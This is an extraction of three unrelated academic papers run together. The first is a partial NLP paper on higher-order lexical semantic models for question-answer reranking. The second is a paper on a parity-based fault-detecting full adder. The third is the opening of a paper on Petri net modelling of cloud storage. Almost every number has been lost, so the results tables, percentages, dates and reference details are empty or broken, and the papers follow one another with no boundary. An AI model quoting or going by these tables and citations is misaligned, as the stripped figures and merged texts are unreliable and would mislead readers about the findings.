dachshund, and pooch, whereas the top associates under wn( ) are: mixedbreed, hound, puppy, rottweiler, and groomer. aggregating features from all orders into a single ranking model guarantees that all this information is jointly modeled. we use the standard implementations for pre- cision at (p@ ) and mean reciprocal rank (mrr) (manning et al., ). several trends are apparent in the table: (i) all first-order lexical models outperform the random and cr baselines, as well as the system of jansen et al. the latter result is explained by the novel features proposed in § . and § . . we detail the contribution of these features in the ab- lation experiment summarized later in table . (ii) more importantly, both p@ and mrr gener- ally increase as we incorporate higher-order ver- sions of each lexical model. out of the six ls models investigated, five improve under their cor- responding higher-order configurations. this gain is most pronounced for the dependency align- ment (da) model, whose p@ increases from . % for the first-order model to . % for a model that incorporates first, second, and third- order features. in general, the performance in- crease in higher-order models is larger for sparser first-order models, where the higher-order mod- els fill in the knowledge gaps of their correspond- ing first-order variants. this sparsity is gener- ated by multiple causes: (a) alignment models are sparser than nnlms because they were trained on less data (approximately k question-answer pairs vs. the entire gigaword); (b) models that use syntactic dependencies as the base lexical units are sparser than models that use words. we conjec- ture that this is why we see the biggest improve- ment from higher order for da (which combines both sources of sparsity), and we do not see an improvement for the word-based nnlm (wn). this hypothesis is supported by the analysis of the corresponding association graphs: in the wa model, counting the number of words compris- ing the top % of the probability mass distribu- tion for each word shows sparse representations with . most-similar words on average; in the wn model, the same statistic shows dense dis- tributed representations with the top % of mass distributed across . million most-similar words per word (or, about % of the vocabulary). (iii) the higher-order models perform well up to an order of or , but not further. for exam- ple, the performance of the word alignment model (wa) decreases at order (row ); similarly, the performance of the word nnlm (wn) decreases at order (row ). this supports our initial ob- servation that long paths in the association graph accumulate noise, which leads to semantic drift. (iv) the levy-goldberg nnlm (dnl-g) is the best first-order model, whereas our dependency- p@ mrr # model p@ impr. mrr impr. baselines random . . cr . – . – jansen et al. ( ) . – . – word alignment (wa) cr + wa( ) . + % . + % cr + wa( - ) . * + % . * + % cr + wa( - ) . * + % . * + % cr + wa( - ) . * + % . * + % word nnlm (wn) cr + wn( ) . + % . + % cr + wn( - ) . + % . + % cr + wn( - ) . + % . + % cr + wn( - ) . + % . + % cr + wn( - ) . + % . + % dependency alignment (da) cr + da( ) . + % . + % cr + da( - ) . * + % . * + % cr + da( - ) . * + % . * + % our dependency nnlm (dno) cr + dno( ) . + % . + % cr + dno( - ) . * + % . * + % cr + dno( - ) . * + % . * + % levy-goldberg dependency nnlm (dnl-g) cr + dnl-g( ) . + % . + % cr + dnl-g( - ) . + % . + % cr + dnl-g( - ) . + % . + % hybrid model: word alignment with nnlm similarity (wan) cr + wan( - ) . + % . + % cr + wan( - ) . * + % . * + % pagerank model: uniform teleportation (pru) cr + pru( ) . + % . + % cr + pru( - ) . * + % . * + % cr + pru( - ) . * + % . * + % pagerank model: personalized teleportation (prp) cr + prp( ) . + % . + % cr + prp( - ) . * + % . * + % cr + prp( - ) . * + % . * + % table : overall results on the yahoo! answers dataset using first-order representations ( ) and first-order in combination with higher-order representations ( -n). bold font indicates the best score in a given column for each model group. an asterisk indicates that a score is significantly better (p < . ) than the first-order version of that model. all significance tests were implemented using one-tailed non-parametric bootstrap resampling using , iterations. model creation time matrix size wa ( ) – mb wa ( ) seconds . gb wa ( ) . minutes . gb wa ( ) . minutes gb pr ( ) – gb pr ( ) . hours gb pr ( ) . hours gb table : runtime and memory requirements for creation of matrices, for the original pagerank and our cautious random walk algorithms. creation of both higher-order wa and pr models is trivially parallelizable, and we report runtimes on a . ghz processor with parallel execution on cores. based nnlm (dno) is the best higher-order model. this is an encouraging result for dno, considering its simplicity. in general, nnlms perform better than alignment models for answer reranking, which is not surprising considering the difference in size of the training datasets. to our knowledge, this is the first time this type of analy- sis has been performed for qa. (v) both pru( - ) and prp( - ) perform better than their first-order variants and better than our p@ mrr # model/features p@ impr. mrr impr. baselines random . . cr . – . – jansen et al. ( ) . – . – words cr + wa( ) + wn( ) . + % . cr + wa( - ) + wn( - ) . * + % . * + % cr + wa( - ) + wn( - ) . * + % . * + % cr + wa( - ) + wn( - ) . + % . + % dependencies cr + da( ) + dno( ) + dnl-g( ) . + % . + % cr + da( - ) + dno( - ) + dnl-g( - ) . * + % . * + % cr + da( - ) + dno( - ) + dnl-g( - ) . * + % . * + % words and dependencies cr + wa( ) + wn( ) + da( ) + dno( ) + dnl-g( ) . + % . + % cr + wa( - ) + wn( - ) + da( - ) + dno( - ) + dnl-g( - ) . † + % . † + % cr + wa( - ) + wn( - ) + da( - ) + dno( - ) + dnl-g( - ) . † + % . † + % table : performance on the yahoo! answers dataset for word, dependency, and models that combine the word and de- pendency representations. bold font indicates the best score in a given column for each model group. an asterisk indicates that a score is significantly better (p < . ) than the first-order version of that model group ( ), and † indicates that a score approaches significance (p < . ). p@ mrr model p@ delta mrr delta cr + wa( ) all features . – . – − p(q|a) . - % . - % − max jsd . % . % − min jsd . - % . - % − composite jsd . - % . % − average jsd . - % . - % cr + wn( ) all features . – . – − max cosine sim. . - % . - % − min cosine sim. . - % . - % − composite cosine sim. . - % . - % − average cosine sim. . - % . - % table : ablation experiments for first-order word models. each row removes a single feature from the corresponding complete model (“all features”). word-based second-order models (wa and wn). as expected, the personalized pr algorithm per- forms better than pru. however, their perfor- mance drops for the third-order models (rows and ), whereas our models continue to improve in their third-order configuration. all our third- order models perform better than all third-order pr models. this is caused by our “cautious” traversal strategy that considers only the closest neighbors during random walks, which controls for semantic drift better than the pr methods. fur- thermore, the resources required for pr are con- siderably larger than the ones needed to imple- ment our methods. table summarizes the re- quirements of the pr algorithm compared to our closest method (wa). as the table shows, pr has a runtime that is two orders of magnitude larger than wa’s, and requires four times as much mem- ory to store the generated higher-order matrices. combining nnlms and alignment models we explore combinations of nnlms and align- ment models in table , which lists results when higher-order nnlms and alignment models are combined for a given representation type. each line in the table corresponds to a single an- swer reranking model, which incorporates features from multiple ls models. these experiments re- inforce our previous observations: higher-order models perform better than their first-order vari- ants regardless of representation type, but perfor- mance increases only for relatively low orders, e.g., orders for words and words combined with dependencies, or orders for dependencies. importantly, the table shows that the combina- tion of nnlms and alignment models across rep- resentation types is beneficial. for example, the best first-order combined model (row in ta- ble ) performs similarly to the best higher-order individual ls model (row in table ). the best combined higher-order model (row in ta- ble ) has a p@ score of . , approximately . % higher than the best individual ls model (row in table ). to our knowledge, this is the highest performance reported on this yahoo! an- swers corpus, surpassing the best model of jansen et. al ( ), which incorporates both shallow and deep discourse information, and achieves . p@ . feature ablation experiments although the main focus of this work is on higher- order ls models, table shows that even our first-order models perform better than the previous state of the art. this is caused by the novel features proposed over alignment models and nnlms. to understand the contribution of each of these fea- tures, we performed an ablation experiment, sum- marized in table , for two models: one alignment model (wa), and one nnlm (wn). this analysis indicates that many of the features proposed are important. for example, two of the novel jsd fea- tures for wa have a higher contribution to over- all qa performance than the alignment probability (p(q|a)) proposed in previous work (surdeanu et al., ). for wn, the two new features pro- posed here (maximum and minimum cosine sim- ilarity between embedding vectors) also have a positive contribution to overall performance, but less than the other two features proposed in previ- ous work (yih et al., ; jansen et al., ). . discussion one important observation yielded by the previ- ous empirical analysis is that higher-order models perform well for sparse first-order variants (e.g., da), but not for first-order models that rely on already dense association graphs (e.g., wn). we suspect that in densely populated graphs, model- ing context becomes critical for successful higher- order models. returning to our example from § , a densely populated graph may already have the associations breakfast – pancakes and pancakes – hashbrowns that allow it to identify restaurants with favorable breakfast foods. exploring higher- order associations in this situation is only ben- eficial if context is carefully maintained, other- wise an answer reranking system may erroneously select answer candidates with different contexts due to accumulated semantic drift (e.g., answers that discuss films, using associations from texts reviewing breakfast at tiffany’s). incorporating word-sense disambiguation or topic modeling into alignment or nnlm models may begin to address these contextual issues by preferentially associat- ing terms within a given topic (such as restau- rants or films), ultimately reducing semantic drift, and extending these higher-order methods beyond a few hops in the graph. our analysis suggests that the extra sparsity that contextually-dependent representations introduce may make those models even more amenable to the higher-order methods discussed here. more generally, we believe that graph-based in- ference provides a robust but approximate middle- ground to inference for qa. where inference us- ing first-order logic offers provably-correct an- swers but is relatively brittle (see ch. in mac- cartney ( )), ls methods offer robustness, but have lacked explanatory power and the ability to connect knowledge into short inference chains. here we have demonstrated that higher-order methods capitalize on indirect evidence gathered by connecting multiple direct associations, and in doing so significantly increase performance over ls approaches that use direct evidence alone. by incorporating contextual information and making use of the short inference chains generated by traversing these graphical models, we hypothe- size that graph-based systems will soon be able to construct simple justifications for their answer se- lection (e.g., pancakes are a breakfast food, and hashbrowns go well with pancakes). we hope it will soon be possible to fill this gap in inference methods for qa with higher-order ls models for robust but approximate inference. conclusions we introduce a higher-order formalism that al- lows lexical semantic models to capitalize on both direct and indirect evidence. we demon- strate that many lexical semantic models, includ- ing monolingual alignment and neural network language models, working over surface or syntac- tic representations, can be trivially adapted to this higher-order formalism. using a corpus of thou- sands of non-factoid how questions, we experi- mentally demonstrate that higher-order methods perform better than their first-order variants for most lexical semantic models investigated, with statistically-significant relative gains of up to % over the corresponding first order models. acknowledgements we thank the allen institute for artificial intelli- gence for funding this work. we would also like to thank the three anonymous reviewers for their helpful comments and suggestions. references eneko agirre and aitor soroa. . personalizing pagerank for word sense disambiguation. in pro- ceedings of the th conference of the european chapter of the association for computational lin- guistics. marco baroni, georgiana dinu, and germán kruszewski. . don’t count, predict! a systematic comparison of context-counting vs. context-predicting semantic vectors. in proceedings of the nd annual meeting of the association for computational linguistics. islam beltagy, cuong chau, gemma boleda, dan gar- rette, katrin erk, and raymond mooney. . montague meets markov: deep semantics with probabilistic logical form. in proceedings of the second joint conference on lexical and computa- tional semantics. adam berger, rich caruana, david cohn, dayne frey- tag, and vibhu mittal. . bridging the lexical chasm: statistical approaches to answer finding. in proceedings of the rd annual international acm sigir conference on research & development on information retrieval. gaurav bhalotia, arvind hulgeri, charuta nakhe, soumen chakrabarti, and shashank sudarshan. . keyword searching and browsing in databases using banks. in proceedings of th international conference on data engineering (icde). peter f. brown, stephen a. della pietra, vincent j. della pietra, and robert l. mercer. . the mathematics of statistical machine translation: parameter estimation. computational linguistics, ( ): – . soumen chakrabarti and alekh agarwal. . learning parameters in entity relationship graphs from ranking preferences. in proceedings of th european conference on principle and practice of knowledge discovery in databases (pkdd). soumen chakrabarti. . dynamic personalized pagerank in entity-relation graphs. in proceedings of the th international world wide web confer- ence (www). marie-catherine de marneffe, bill maccartney, and christopher d. manning. . generating typed dependency parses from phrase structure parses. in proceedings of the international conference on language resources and evaluation (lrec). abdessamad echihabi and daniel marcu. . a noisy-channel approach to question answering. in proceedings of the st annual meeting of the asso- ciation for computational linguistics (acl). oren etzioni. . search needs a shake-up. nature, ( ): – . peter jansen, mihai surdeanu, and peter clark. . discourse complements lexical semantics for non- factoid answer reranking. in proceedings of the nd annual meeting of the association for com- putational linguistics (acl). ni lao and william w. cohen. . relational re- trieval using a combination of path-constrained ran- dom walks. machine learning, ( ): – . ni lao, tom mitchell, and william w. cohen. . random walk inference and learning in a large scale knowledge base. in proceedings of the conference on empirical methods in natural language pro- cessing (emnlp). heeyoung lee, marta recasens, angel chang, mi- hai surdeanu, and dan jurafsky. . joint en- tity and event coreference resolution across docu- ments. in proceedings of the joint conference on empirical methods in natural language process- ing and computational natural language learning (emnlp-conll). omer levy and yoav goldberg. a. dependency- based word embeddings. in proceedings of the nd annual meeting of the association for computa- tional linguistics (acl). omer levy and yoav goldberg. b. linguistic reg- ularities in sparse and explicit word representations. in proceedings of the conference on computational natural language learning (conll). dekang lin. . automatic retrieval and clustering of similar words. in proceedings of the th annual meeting of the association for computational lin- guistics and the th international conference on computational linguistics (coling-acl- ). bill maccartney. . natural language inference. ph.d. thesis, stanford university. christopher d. manning, prabhakar raghavan, and hinrich schütze. . introduction to information retrieval. cambridge university press. christopher d. manning, mihai surdeanu, john bauer, jenny finkel, steven j. bethard, and david mc- closky. . the stanford corenlp natural lan- guage processing toolkit. in proceedings of the nd annual meeting of the association for com- putational linguistics (acl). tara mcintosh. . reducing semantic drift in biomedical lexicon bootstrapping. ph.d. thesis, university of sydney. tomas mikolov, kai chen, greg corrado, and jeffrey dean. . efficient estimation of word repre- sentations in vector space. in proceedings of the international conference on learning representa- tions (iclr). einat minkov, william w. cohen, and andrew y. ng. . contextual search and name disambiguation in email using graphs. in proceedings of sigir. vanessa murdock and w. bruce croft. . a trans- lation model for sentence retrieval. in proceedings of the conference on human language technology and empirical methods in natural language pro- cessing, pages – . courtney napoles, matthew gormley, and benjamin van durme. . annotated gigaword. in pro- ceedings of the joint workshop on automatic knowl- edge base construction and web-scale knowledge extraction, pages – . association for compu- tational linguistics. franz josef och and hermann ney. . a sys- tematic comparison of various statistical alignment models. computational linguistics, ( ): – . lawrence page, sergey brin, rajeev motwani, and terry winograd. . the pagerank citation ranking: bringing order to the web. technical re- port - , stanford infolab, november. stefan riezler, alexander vasserman, ioannis tsochantaridis, vibhu mittal, and yi liu. . statistical machine translation for query expansion in answer retrieval. in proceedings of the th an- nual meeting of the association for computational linguistics (acl). radu soricut and eric brill. . automatic question answering using the web: beyond the factoid. jour- nal of information retrieval - special issue on web information retrieval, ( ): – . md. arafat sultan, steven bethard, and tamara sum- ner. . back to basics for monolingual align- ment: exploiting word similarity and contextual ev- idence. transactions of the association for compu- tational linguistics, : – . mihai surdeanu, massimiliano ciaramita, and hugo zaragoza. . learning to rank answers to non- factoid questions from web collections. computa- tional linguistics, ( ): – . hanghang tong, christos faloutsos, and jia-yu pan. . fast random walk with restart and its applica- tions. in proceedings of the th international con- ference on data mining (icdm). xin-jing wang, xudong tu, dan feng, and lei zhang. . ranking community answers by modeling question-answer relationships via analogical reason- ing. in proceedings of the annual acm sigir con- ference. max whitney and anoop sarkar. . bootstrap- ping via graph propagation. in proceedings of the th annual meeting of the association for compu- tational linguistics. xuchen yao, benjamin van durme, chris callison- burch, and peter clark. . semi-markov phrase-based monolingual alignment. in proceed- ings of the conference on empirical methods in nat- ural language processing (emnlp). david yarowsky. . unsupervised word sense dis- ambiguation rivaling supervised methods. in pro- ceedings of the rd annual meeting of the associa- tion for computational linguistics (acl). wen-tau yih, ming-wei chang, christopher meek, and andrzej pastusiak. . question answering using enhanced lexical semantic models. in proceedings of the st annual meeting of the association for computational linguistics (acl). benat zapirain, eneko agirre, lluis marquez, and mi- hai surdeanu. . selectional preferences for se- mantic role classification. computational linguis- tics, ( ). a fault detection method for combinational circuits aliabbasszoraghchian , moslem didehban , mohammadreza mehrabian .department of computer engineering allamemohaddesnoori institute of higher education mazandaran, iran, zaliabbass@yahoo.com .department of computer engineering and information technology amirkabir university of technology, tehran, iran, m_didehban@aut.ac.ir .department of computer engineering and information technology amirkabir university of technology, tehran, iran, mhrb @aut.ac.ir abstract. as transistors become increasingly smaller and faster and noise margins become tighter, circuits and chip specially microprocessors tend to become more vulnerable to permanent and transient hardware faults. most microprocessor designers focus on protecting memory elements among other parts of microprocessors against hardware faults through adding redundant error-correcting bits such as parity bits. how ever, the rate of soft errors in combinational parts of microprocessors is consider edas important as in sequential parts such as memory elements nowadays. the reason is that advances in scaling technology have led to reduced electrical masking .this paper proposes and evaluates a logic level fault-tolerant method based on parity for designing combinational circuits. experimental results on a full adder circuit show that the proposed method makes the circuit fault- tolerant with less overhead in comparison with traditional methods. it will also be demonstrated that our proposed method enables the traditional tmr method to detect multiple faults in addition to single fault masking. keywords: soft error, transient fault, fault-tolerance, combinational circuits, full adder. . introduction as the transistor dimensions have shrunk and the large-scale integration in electronic switches has increased, chip fabricators can insert more than one billion transistors in a single chip. such integration scale can increase the performance of chips. many of new architecture techniques, such as superscalar and chip-multi processor (cmp), actually need such number of transistors. however, the ever-increasing nonlinear power consumption in the technology trend could be a disaster for circuits, because the transistor density is going up intensely. to prevent this problem we should decrease the voltage supply, and this change can lead to falling the noise margin in the circuit [ ]. on the other hand, by shrinking the feature size, the factor qcritical (electrical charge of capacitances) is decreased too, and this problem can lead to increase the probability of fault occurrence in the circuit [ ]. it is proved that large- scale circuit integration increases the failure rate exponentially [ ].generally, in new generation technologies, we have less reliability than the old ones. some of the reasons for these problem sare: lower cl (load capacitance), lower vdd or vcc (supply voltage)that lead toa smaller noise margin, lower qcritical, more process variation [ ] and manufacturing defects[ ]. these factors affect the reliability, that is a key concept along with performance and power metrics, and needs to use a fault-tolerance mechanism [ , , ].typically, all components of chip scan be classified in to two categories, logic block sand memory elements. commercial microprocessors typically use error correction codes (eccs) to protect these circuit elements. eccs, such as parity, add latency to each access and results in an appreciable performance penalty, moreover, it is difficult to implement for logic blocks [ , ].however, combinational circuits are very importance for fault-tolerant design. because new technologies are facing less degree of electrical masking and this phenomenon makes circuits more susceptible to faults [ ]. in [ ] it has been mentioned that from the year on importance of improving fault coverage in combinational circuits will overcome the sequential ones. for this reason, we decided to choose this area for the implementation of our technique. fault-tolerance techniques are generally accomplished by using redundancy in hardware, software, time and information [ ]. in this paper, we have used hardware redundancy in combinational circuits. some of the fault-tolerant hardware methods are duplication with comparison (dwc)in which the module is duplicated, result sare compared and if one mismatch occurs, an error flag is raised.n-modular redundancy (nmr) design techniques add reliability to a system at the expense of extra hardware resources. in an nmr system, all protected modules must be replicated n times, in order to allow for automatic masking of n/ of faults happening in separate modules.standard triple-module redundancy (tmr) methods are used frequently. using these methods, triple modules and voting circuits are implemented onto an application specific integrated circuit (asic) or a field-programmable gate array (fpga). when a fault occurs, the voting circuit neglects the value of a faulty module and takes a correct value of the other two non-faulty modules. these methods come with high area and power dissipation penalties and are inherently proposed for detecting or masking a single fault [ ].this paper is organized as follows: section presents a brief background of fault sensitivity in combinational and sequential circuits ;in section we proposed a new fault- tolerance technique in combinational circuits;in section we apply this method to full adder circuit; and finally, in section concluded. . background single event transient pulse is induced when cosmic particles such as neutron strikes, or radiation from packaging materials such as alpha particle with enough energy hit the sensitive region in the circuit [ ]. the voltage pulse propagates through an activated path in the logic circuit. when itis captured by a clock edge, a soft error occurs. otherwise, that pulse is called a transient fault [ ].in recent years, with advance in the technology of fabrication, transistor quantities, processors are becoming increasingly vulnerable to transient faults [ ].transient faults currently account for over % of faults in processor-based devices [ ].in a typical integrated circuit, memory arrays, latch elements, and combinational logic are the most sensitive parts and could be affected by soft errors and transient faults. historically, soft errors were a concern in the design of memory elements, but the susceptibility of the combinational blocks to transient faults increases as a side effect of technological scaling. combinational logics are usually used for designing arithmetic circuits (such as adders, multipliers, etc) or in other words the data path of a computer. we should know the importance of employing combinational circuits in applicable chips processing is rising, as they are simpler, operate faster, and consume less power than sequential ones. moreover, many of statistical researches proved this statement [ , ].combinational circuits occupy a considerable portion of processing chips in comparison with sequential circuits. for example in fpgas,the ratio of using combinational circuits to sequential ones varies between to times [ , ].fig. : overall new approach framework continuous device scaling,higher degree of pipeliningand decreasing electrical masking effect, contribute to the increase in soft error rates in combinational circuits [ ].transient faults in combinational circuits are catching up with errors in memory elements [ ]. a transient fault in a logic circuit might not be captured in a memory circuit, because it could be masked by one of the following three phenomena [ , , ]:first, logical masking, occurs when a particle strikes a portion of the combinational logic that is blocked from affecting the output due to a subsequent gate whose result is completely determined by other input values.second, electrical masking, occurs when the pulse resulting from a particle strike is attenuated by subsequent logic gates due to the electrical properties ofthe gates to the point that it does not affect the result of the circuit.third, latching-window masking,occurs when the pulse resulting from a particle strike reaches a latch, but not at the clock transition where the latch captures its input value. these masking effects have been found to result in a significantly lower rate of soft errors in combinational logic compared to storage circuits in equivalent device technology [ ]. however, these effects could diminish significantly as feature sizes decrease and the number of stages inthe processor pipeline increases. electrical masking could be reduced by device scaling because smaller transistors are faster and hence may have less attenuation effect on a pulse. also, deeper processor pipelines allow higher clock rates, meaning the latches in the processor will cycle more frequently, which may reduce latching-window masking. hence, in this work we focus on occurrence of transient faults and soft errors in combinational logic circuits and suggest a logic level fault-tolerant design method. . new approach framework in this paper we presented a new approach to design fault-tolerant combinational circuits. assume a logic circuit with m-input and n-output lines. each output is a logic function of inputs. in this method, we use hardware redundancy to add a redundant output signal to the circuit. this new output generates the parity bit for output set. the value of redundant output is directly derived from the input lines.there are two main types of parity checking in digital systems, odd parity (po) and even parity(pe). both of these types can be used in our scheme. because parity checking mechanism is a relative method and it is sufficient that both sides be aware of the convention of data communication [ ].if we model the input/output sides of a logic circuit by the sender/transmitter stations in a telecommunication system, we can say that parity checking is a conventional method to check the bit errors in the telecommunication systems. in this technique, the transmitter station tries to send an extra bit accompanied by transmission data bits,in order to detect single bit errors that may occur on the channel after getting data by the receiver station. in our scheme, first we calculated the truth table of the redundant output line as an even/odd parity for output lines. then, try to make it related to the input bit arrangements.after finding the function role and simplifying it, we can plot by the least needed logic gates. it is important that we should not use the middle terms of the main circuit to design this redundant line. if middle term are used, faults occurring before these branches would not appear on the output (i.e. the redundant parity signal).if we assume using the even parity mechanism for designing the redundant output line, xoring this line with the other main circuit outputs can demonstrate the error occurrence. we name the result of this xor gate as the error signal. seeing zero in this line means that no error has occurred, and seeing one can refer to an error in a part of the circuit. it is clear that by using the odd parity checking mechanism xor gate converts to xnor gate, but the outline of overall method remains as before. the framework of this scheme has been shown in fig. . tmr method is a conventional technique to design fault-tolerant circuits. this technique can mask a single fault by voting results. but, if multiple faults occur in the modules, this method is unable to mask or detect them. as a result, incorrect outputs are voted and an error is appeared as the result of the circuit. hence, tmr treats weakly when facing multiple faults. replacing our proposal module with conventional tmr modules can help to detect multiple faults by voting error signals in addition to the other output lines.it worth emphasize that our proposed approach is capable to detect all single faults that may occur in the logic circuit, whether they lie in the main part of circuit or not. fig. : overall new approach framework . a case study alus are very important combinational circuit block that lie on the computational data path in the processors. the reason for their importance can be related being on the critical path. typically, a key point of delay propagation in the processors is the maximum length of path between source registers and destination ones[ ]. this length is depended upon the number of alu functional units (fus) that are lied on this computational path. critical path on the processors should be designed as a fault tolerance path in order to increase reliability. a. designing fault-detection full adder (fdfa) figure .gate-level fdfa a to show the effects of our approach in practice, we used a fdfa an applicable logic circuit in the alus. fa is a simple logic circuit that is used as a basic element to design many of functional units, such as adders, subtracters, multipliers, dividers, etc. all circuits in our experiments are custom designed and laid out in . v, . µmcmostechnology and simulated by using hspicetool. this circuit uses a redundant part to provide an even parity for outputs sum and cout, which is named e. eis a logic function of fa input lines, named a, b and cin. the value of this output line is selected in a way that the number of bits in three output lines, always be even.table i shows the truth table of fdfa. table i: truth table of fdfa a b cin sum cout e cinbacinbacinbacinbae .........  ( ) after deriving the value of e line for all input arranges, the equation ( ) simply is resulted. this equation shows that in order to implement e line, three nands and three nots are totally needed. in the next stage, we try to design this circuit by above gates. the derived gate-level design of fdfa has shown in fig. . after it, we sketch the layout of this circuit in the l-edit tool and get the waveforms of fdfa operation with giving some experimental inputs. fig. shows these waveforms for all of input and output lines. b. implementation results we demonstrated the hardware and timing overheads of using fdfa in comparison with the nfa. next, with adding a xor gate into the fdfa(as xfdfa), the calculated overheads compared with the dwc method with nfa modules. table ii shows area, propagation delay and dynamic power consumption overheads. the area overhead is about % that is the result of additional transistors in fdfa design. about propagation delay, that is a very important factor to evaluate circuit specifications, both of schemes are similar.because worst-case delay is limited by path of generating sum signal.in table iii,we compared xfdfa with dwc figure .gate-level fdfa because both of them are capable to detect a single fault. figure . fdfa waveforms table ii: nfa vs. fdfa metric method area dela y power (fwt) layout area # of transistor s nfa * λ τ . fdfa * λ τ . overhead % % % % table iii: dwc vs.xfdfa metric method area delay power (fwt) layout area # of transisto rs dwc * λ . τ . xfdfa * λ . τ . improvem ent % % - % % in order to implement dwc, we use two coupled nfas with xored similar outputs together to check results. our xfdfa is designed with transistors less than dwc and almost can save % in dynamic power consumption. because the redundant component in dwc is greater than xfdfa.but, in delay we are penalized about %. the reason of this penalty is using a two level xor in the final stage of xfdfa.if we verify the arrangement of gates in each circuit by using logic level viewing, find out that both of these methods use a -level combinational circuit in their output side, but the last gate in dwc (an or gate) is quicker than the end gate of xfdfa (a xor gate). . conclusions in this paper, we proposed a new approach to design fault-tolerant combinational circuits. the main idea behind our proposed approach is using a redundant circuit that operates as an even parity generator for main output lines. we also showed that traditional methods such as tmr detect multiple faults in addition to single faults if they are combined with the proposed method. experimental results obtained from testing the proposed approach on a full adder circuit exhibit about . %overhead in area and % penalty in power consumption, which shows about . % improvement in area and % in power over the traditional dwc method. this method shows to perform almost equal to dwc from propagation delay point of view. references [ ] j. srinivasan, s. v. adve, p. bose, and j. a. rivers, "the impact of technology scaling on lifetime reliability," presented at the int. conf. dependable systems and networks, june . [ ] k. mohanram, and n. a. touba, "cost-effective approach for reducing soft error failure rate in logic circuits," presented at the itc. conf. international test conference, , pp. . [ ] p. shivakumar, m. kistler, s. w. keckler, d. burger, and l. alvisi, "modeling the effect of technology trends on the soft error rate of combinational logic," presented at the dsn. conf. proceedings of international conference on dependable systems and networks, june , p. – . [ ] s. borkar, t. karnik, s. narendra, j. tschanz, a. keshavarzi, and d. vivek, "parameter variations and impact on circuits and microarchitecture," presented at the conf. design automation, june . [ ] k. constantinides, s. plaza, j. blome, b. zhang, v. bertacco, s. mahlke, t. austin, and m. orshansky, "bulletproof: a defect-tolerant cmp switch architecture," presented at the int. conf. symposium on high performance computer architecture, february . [ ] v. narayanan, and y. xie, "reliability concerns in embedded system designs," presented at the conf. ieee computer society, jan , ( ): – . [ ] d. t. franco, j. f. naviner, and l. naviner, "yield and reliability issues in nanoelectronic technologies," presented at the ann. conf. telecommunication, , ( – ): – . [ ] j. f. zielger, and h. puchner, "ser-history, trends and challenges," presented at the conf. cypress semiconductor corporation, . [ ] v. stojanovic, "a cost-effective implementation of an ecc-protected instruction queue for out-of-order microprocessors," presented at the dac. conf., . [ ] s. mukherajee, "architectural design for soft errors," in morgan kaufmann publishers, . [ ] b. johnson, "design and analysis of fault-tolerant digital systems," in addison wesley reading ma, . [ ] j. a. blome, s. gupta, s. feng, and s. mahlke, “cost-efficient soft error protection for embedded microprocessors,” in cases, , pp. – . [ ] s. mukherjee, j. emer, and s. reinhardt, “the soft-error problem: an architectural perspective,” presented at the hpca- conf. th int. symp. high performance computer architecture, . [ ] r. k. dyeriyer, and d. j. rossetti, "a measurement-bascd model for workload dependence of cpu errors," presented at the ieee trans. comp., vol. c- , pp. - , june . [ ] z. a. obaid, n. sulaiman, and m. n. hamidon, "developed method of fpga-based fuzzy logic controller design with the aid of conventional pid algorithm," presented at the australian journal of basic and applied sciences, , ( ): - . [ ] k. perkuszewski, k. t. pozniak, w. jalmuna, w. koprek, j. szewinski, and r. s. romaniuk, "fpga based multichannel optical concenrator simcon . ," presented at the tesla cavities llrf control system, deutsche elektronen-synchrotron (desy), germany, . [ ] t. siriwan, and p. nilagupta, "hpgast: high performance ga-based sequential circuits test generation on beowulf pc-cluster," presented at the conf. pahonyothin rd. lardyao jatujak bangkok thailand, . [ ] f. kocan, and d. g. saab, "dynamic fault diagnosis of combinational and sequential circuits on reconfigurable hardware," presented at the journal of electron test, springer science, september , : – . [ ] m. p. baze, and s. p. buchner, “attenuation of single event induced pulses in cmos combinational logic,” presented at the ieee trans. on nuclear science, vol. , no. , pp. – , december . [ ] p. liden, p. dahlgren, r. johansson, and j. karlsson, “on latching probability of particle induced transient in combinatorial networks,” presented at the th symposium on fault-tolerant computing (ftcs), pp. – , june . [ ] m. d. chinn, "survey based expectations and uncovered interest rate parity," university of wisconsin, madison and nber, october . [ ] a. saberkari, a. afzalikosha, and s. b. shokouhi, “a new low voltage and low power cmos one bit full-adder using gdi technique,”presented at the th iranian conference on electrical engineering (icee), amirkabir university, tehran, iran, may . petri net based modeling and analysis for improved resource utilization in cloud computing petri net based modeling and analysis for improved resource utilization in cloud computing muhammad rizwan ali , farooq ahmad , muhammad hasanain chaudary , zuhaib ashfaq khan , mohammed a. alqahtani , jehad saad alqurni , zahid ullah and wasim ullah khan department of computer science, western norway university of applied sciences, bergen, norway department of computer science, comsats university islamabad, lahore campus, lahore, pakistan department of electrical & computer engineering, comsats university islamabad, attock campus, attock, pakistan department of computer information systems, college of computer science and information technology, imam abdulrahman bin faisal university, dammam, saudi arabia department of educational technology, college of education, imam abdulrahman bin faisal university, dammam, saudi arabia department of information systems, faculty of computing and information technology, king abdulaziz university, jeddah, saudi arabia school of electrical engineering and automation, wuhan university, wuhan, china abstract the cloud is a shared pool of systems that provides multiple resources through the internet, users can access a lot of computing power using their computer. however, with the strong migration rate of multiple applications towards the cloud, more disks and servers are required to store huge data. most of the cloud storage service providers are replicating full copies of data over multiple data centers to ensure data availability. further, the replication is not only a costly process but also a wastage of energy resources. furthermore, erasure codes reduce the storage cost by splitting data in n chunks and storing these chunks into n + k different data centers, to tolerate k failures. moreover, it also needs extra computation cost to regenerate the data object. cache-a replica on modification (carom) is a hybrid file system that gets combined benefits from both the replication and erasure codes to reduce access latency and bandwidth consumption. however, in the literature, no formal analysis of carom is available which can validate its performance. to address this issue, this research firstly presents a colored petri net based formal model of carom. the research proceeds by presenting a formal analysis and simulation to validate the performance of the proposed system. this paper contributes towards the utilization of resources in clouds by presenting a comprehensive formal analysis of carom. subjects algorithms and analysis of algorithms, computer education, data science keywords cloud computing, replication, colored petri net, formal analysis introduction cloud computing is an emerging paradigm of information technology. moreover, cloud computing is an it criterion that provides universal access to shared pools of system resources through the internet. the resources can be provided on demand on pay or in the how to cite this article rizwan ali m, ahmad f, hasanain chaudary m, ashfaq khan z, alqahtani ma, saad alqurni j, ullah z, khan wu. . petri net based modeling and analysis for improved resource utilization in cloud computing. peerj comput. sci. :e doi . /peerj-cs. submitted october accepted december published february corresponding author muhammad hasanain chaudary, mhchaudary@cuilahore.edu.pk academic editor muhammad asif additional information and declarations can be found on page doi . /peerj-cs. copyright rizwan ali et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:mhchaudary@�cuilahore.�edu.�pk https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / 